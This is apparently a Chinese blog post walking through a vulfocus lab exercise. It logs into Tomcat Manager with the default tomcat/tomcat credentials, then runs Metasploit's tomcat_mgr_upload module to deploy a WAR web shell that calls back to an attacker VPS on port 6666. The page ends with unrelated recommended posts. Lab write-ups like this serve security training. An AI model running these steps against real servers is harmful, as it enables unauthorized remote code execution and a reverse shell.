tomcat弱口令

Zab Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell。

漏洞编号:

影响版本:
弱口令

复现步骤:
1,打开漏洞环境vulfocus

2,访问URL点击Manager App

3,验证弱口令,输入默认账号密码tomcat tomcat

4,使用msf进入exploit/multi/http/tomcat_mgr_upload模块

5,依次设置

set rhost vulfocus.fofa.so set rport 60231 set httpusername tomcat set httppassword tomcat set lhost VPS IP set lport 6666

6,run

7,查看flag

想了解更多关于tomcat弱口令的内容,请扫微信
或微信搜索jiemingpan

本文链接:http://www.soufuzi.com/jianzhan/2308

(0)
上一篇 2024-07-19 23:06:40
下一篇 2024-07-19 23:06:40

相关推荐

  • .io域名注册

    .io 是英属印度洋领地的简写。在域名圈中,通常会被认为.io代表的是input/output,意为知识的输入输出。这使得.io域名在文教界也比较出名,一些培训课程类网站,知识类网站都很喜欢用.io域名。 io域名注册要求 1、个人和企业都可以进行注册,没有门槛 2、当io域名过期后,会有一个月的域名待续费保护,一个月的赎回期,赎回期期限后5天域名将会进入删除期,然后就会被再次公开注册。

    2023-12-28 09:19:14
  • 斯里兰卡国家储蓄银行

    斯里兰卡国家储蓄银行 National Savings Bank(Sri Lanka,NSB)是一家斯里兰卡国有储蓄银行,总部位于科伦坡。它根据1971年国家储蓄银行第30条法案和1988年银行法第30条款被授予专门银行权利,因而在锡兰成立。 斯里兰卡国家储蓄银行拥有227家分行。它与斯里兰卡的643家邮局和34012家子邮局合作来开展邮政银行业务。电话号码:0094112573008/0094112573015,传真:0094112573178。

    2023-08-04 23:22:23